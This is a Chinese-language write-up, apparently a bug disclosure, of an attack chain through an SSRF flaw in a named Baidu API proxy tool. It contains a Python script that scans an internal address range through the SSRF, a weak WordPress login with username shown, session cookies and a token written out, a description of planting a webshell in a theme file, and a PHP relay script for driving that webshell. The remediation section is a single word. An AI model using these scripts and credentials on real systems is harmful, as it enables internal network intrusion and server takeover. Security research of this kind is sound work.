所有故事从一个简单的SSRF说起。。。

1、某次发现一个SSRF

http://apistore.baidu.com/astore/toolshttpproxy

 

功能十分全，包括get post 什么的。



2、内网探测

首先从dns爆破中获取部分内网ip，然后写个脚本探测



探测脚本

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import json
import traceback
import urllib
 
reload(sys)  
sys.setdefaultencoding('utf8')  

headers = {'cookie':'自己加上','Content-Type':'application/x-www-form-urlencoded; charset=UTF-8','X-Requested-With':'XMLHttpRequest','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0'}

for i in range(1, 255):
    try:
        print i
        s = "172.22.1.%s" % (i)
        conn = httplib.HTTPConnection('apistore.baidu.com')
        conn.request(method='POST',
                     url="/astore/toolshttpproxysend",
                     body='reqMethod=GET&reqUrl=http%3A%2F%2F' + s +'&token=token',
                     headers=headers)
        msg = conn.getresponse().read()
        msg = json.loads(msg)
        if msg["retMsg"] == "success":
           print s
           f = open('rrrr.txt','ab+')
           f.write(s + '\r\n')
           f.write( urllib.unquote(msg["retData"]["responseHeader"]).replace('<br/>','\r\n') + '\r\n')
           f.write( urllib.unquote(msg["retData"]["responseBody"]).replace('<br/>','\r\n') + '\r\n\r\n')
           f.close()
        conn.close()
    except:
        print traceback.format_exc()
        pass

探测结果：
 

 

其中有个 wordpress 程序引起我注意

http://172.22.1.19 (cdm.baidu.com)



3、wordpress 弱口令探测


 

弱口令结果还是比较多

wanglu admin

拿了一个测试下

先登陆 POST，再根据获取回来的cookie，加入到请求头中。



http://apistore.baidu.com/astore/toolshttpproxysend?



reqMethod=POST&reqUrl=http://172.22.1.19/wp-admin/&token=ae6e554399dd045278f4128312f13853&&reqHeaders[0][key]=Cookie&reqHeaders[0][value]=wc_session_cookie_534fc29aac95152772c55e78ddffb136=8fpvzWnjz76BNkvv4GJMrx1gvfVihDFS%7C%7C1425449844%7C%7C1425446244%7C%7C4bcc9f20e60d5905d3aaf9eda0c5fe28;woocommerce_items_in_cart=0;woocommerce_cart_hash=0;wordpress_test_cookie=WP+Cookie+check;wordpress_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7Cba1f72d7cd9660584197a34afaf1caf8;wordpress_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7Cba1f72d7cd9660584197a34afaf1caf8;wordpress_logged_in_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7C04c26a78d42c83cb884f52071d5c28c8;



成功查询到后台登陆成功后的 html。



后面就是简单的wordpress 拿shell，写模板。



这个过程比较麻烦，不过折腾下就可以成功。



4、连接webshell

为了方便操作，本地写了一个php的转发代理
 

<?php 
$webshell="http://apistore.baidu.com/astore/toolshttpproxysend";

$data['reqMethod']='POST';
$data['reqUrl']='http://172.22.1.19/wp-content/themes/salient-new/404.php';
$data['token']='ae6e554399dd045278f4128312f13853';

$i = 0;
foreach($_POST as $key => $value)
{
 $data["reqBodyParams[$i][key]"]=$key;
 $data["reqBodyParams[$i][value]"]= urlencode( $value );
 $i++;
}

$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => 'POST',   
'header'=> "Content-type: application/x-www-form-urlencoded\r\nCookie: cookie\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n" .   
"Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
 
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); 

$data = json_decode($html,true);

echo urldecode($data["retData"]["responseBody"]);

?>

过程完成，获取权限。
 

 

解决方案：

过滤